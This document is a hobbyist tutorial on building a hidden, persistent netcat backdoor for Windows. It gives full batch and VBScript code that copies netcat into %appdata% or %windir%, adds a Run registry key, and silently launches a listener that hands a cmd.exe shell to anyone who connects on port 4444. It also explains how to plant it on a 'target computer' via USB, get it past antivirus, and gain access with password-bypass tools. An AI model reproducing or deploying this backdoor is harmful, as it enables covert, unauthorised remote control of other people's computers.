Simple Netcat Backdoor

After reading this old instructable and this one, I felt that it was necessary to update the information, so if you haven't seen those yet, make sure to check them out. But anyway, I assume you already know what netcat is and what it is used for so if you don't know already, netcat is a computer networking utility for reading from and writing to network connections. But the cool part about it, is that it can be made to make simple backdoors which is what we will be doing in this instructable. Unlike other reverse shells (backdoors) such as meterpreter, netcat is very easy to use and understand.

This instructable assumes you have basic permissions or better yet admin permissions on the target computer. Probably with an ophcrack liveCD or even easier, a Kon-Boot CD.

So yeah, getting a clean compiled version of netcat nowadays can be quite a challenge since all so called 'hack tools' are considered virus. So I have saved you hours of searching trying to find it. But if you already know how to compile C files, you can compile the files yourself by going to the official site and downloading the source code. But anyway you can download a compiled version here LINK, which is the one I will be using. Next, create a folder and move nc.exe inside it.

NOTE: Since netcat is considered a hack tool, you will probably need to allow it through your anti-virus.

You will also need putty for this tutorial which can be downloaded here: LINK

So after you have gotten a compiled version of netcat, open up netcat in cmd by shift-right-clicking and copying the path of netcat, then pasting it into cmd. Press enter and type -h, then you should see something like in pic 1 of this instructable.

NOTE: make sure netcat is called nc.exe if you compiled it yourself.

You should see many options, but the only ones we are using are: -L, -d, -p, -t and -e. So first -L which is pretty self-explanatory, it is just a way to make netcat more persistent. -d is optional since we are going to make the program run invisibly anyway but it just makes netcat keep running, even if the cmd window is closed. -p is the port number to listen on. And just like in duck tapes instructable, we will be using port 4444. -t is used if you want to use telnet to connect aswell. -e means which program to launch on connect. I know it says [dangerous!] but don't worry, as long as you use -e cmd.exe you should be fine.

So to create the installer, we could use vbs, but it would be a lot more complicated to create the installer so I decided to use good old batch to keep it simple. So open up notepad or any other batch editor and paste in the following code:

@echo off
setlocal enableextensions
cd /d "%~dp0"
copy nc.exe %appdata%\nc.exe
copy run.vbs %appdata%\run.vbs
if %errorlevel% NEQ 0 (
echo.
echo an error has occured while copying files
pause
exit
)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%appdata%\run.vbs"
if %errorlevel% NEQ 0 (
echo.
echo an error has occured while writing to the registry
pause
exit
)
echo.
ipconfig
echo.
echo.
echo now write down the ip address
echo.
echo.
pause

Now save the file as install.bat in the same directory as nc.exe.

NOTE: if you have admin permissions on the target computer change HKCU to HKLM on line 12 (pic 1). And on the same line change %appdata% to %windir%. Also change on line 4 and 5 %appdata% to %windir%.

If you already know batch, you can move on to the next step otherwise I will explain some code to you.

copy nc.exe %appdata%\nc.exe
copy run.vbs %appdata%\run.vbs

These two lines copy nc.exe (netcat) to the appdata directory as well as run.vbs which I will show you how to make in the next step. Also, every part were it says %errorlevel%, is just checking for errors.

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%appdata%\run.vbs"

This next line adds a registry key to run 'run.vbs' whenever the user logs on. You may notice in duct tapes guide, he used HKLM. The reason why I did not use HKLM is you need to run the file as an administrator in newer versions of windows. But if you know that the account that you will be on has admin privileges want you could change HKCU to HKLM to allow the backdoor the run on all users.

ipconfig
echo now write down the ip address

This code just runs the ipconfig command, and tells the user to write down the ip address as seen in the ipconfig command which will be important later on.

NOTE: If you are confused about how to create this installer or the launcher (next step), I have created a easy installer made in vbs that creates and installs the files for you (pic 3), you can download it here:

So now that we have created the installer we must create the launcher. So open up notepad or any other VBScript Editor and type in the following code:

Dim objWshShl : Set objWshShl = WScript.CreateObject("WScript.Shell")
objWshShl.CurrentDirectory = objWshShl.ExpandEnvironmentStrings("%appdata%")
objWshShl.Run "nc.exe -L -d -p 4444 -t -e cmd.exe",0

Then save this file as run.vbs in the same directory as nc.exe and install.bat.

NOTE: if you have admin permissions on the target computer change %appdata% to %windir% on line 2

So anyway I will explain this short vbscript to you.

The first line just declares and sets up an object. The next line changes the current directory to the install location (%appdata%).

objWshShl.Run "nc.exe -L -d -p 4444 -t -e cmd.exe",0

This just runs the netcat command with the options that I explained in step 2. The ,0 just makes the program run invisibly.

Alrighty, now we are finished with the files and we can move on to installing it.

Now that we have all three files, we can install the program. So copy the folder with all three files and paste it on a usb stick and then go to your target computer.

So all you have to do to install is run 'install.bat'. Then write down the ip address as show in the cmd window in pic 1 (it's blank because I masked out my info).

NOTE: if you changed HKCU to HKLM and %appdata% to %windir%in the install.bat, you must right-click and run the installer as an administrator.

Now if you open up regedit and navigate to HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (pic 2 or 3), you should see a value called nc.

Now if you navigate to %appdata% or %windir% (pic 4 or 5). You should see nc.exe and run.vbs. If you want you could restart the computer to start netcat, but if you want to start netcat right away, double-click on run.vbs.

NOTE: You may need admin permissions to allow it through a firewall or antivirus such as in pic 6.

So now that you are back on your own computer, we must now connect to our target computer. So we could either use telnet or putty to connect. Since telnet is not enabled by default in higher versions of windows, we will be using putty that we downloaded earlier.

So open up putty and enter in the ip address that you wrote down earlier. Then enter '4444' for the port number. Check 'Raw' for connection type. Press ok and a cmd window should appear such as in pic 1.

Now you are connected and you can do whatever cmd commands you want remotely. Such as opening up web sites by typing: start www.google.com. Or viewing files by using the dir command, getting name of other computers in a network by typing net view, etc. As I said you use any cmd command you want. I will probably create a step later on, showing the cool stuff you can do while connected.

NOTE: This will only work inside a network.

To remove the backdoor off the computer simply open up task manager and kill 'nc.exe' Then open up regedit and delete the value as shown in step 5. Then navigate to %appdata% or %windir% and delete nc.exe and run.vbs. Or just use my vbs uninstaller:

Have fun with netcat!

I hope you found this instructable useful and if you have any questions, or concerns please leave a comment or pm me.

As I said, I will probably create a step on cool features you can do while connected.

Please use this program responsibly, I am not responsible for anything you do.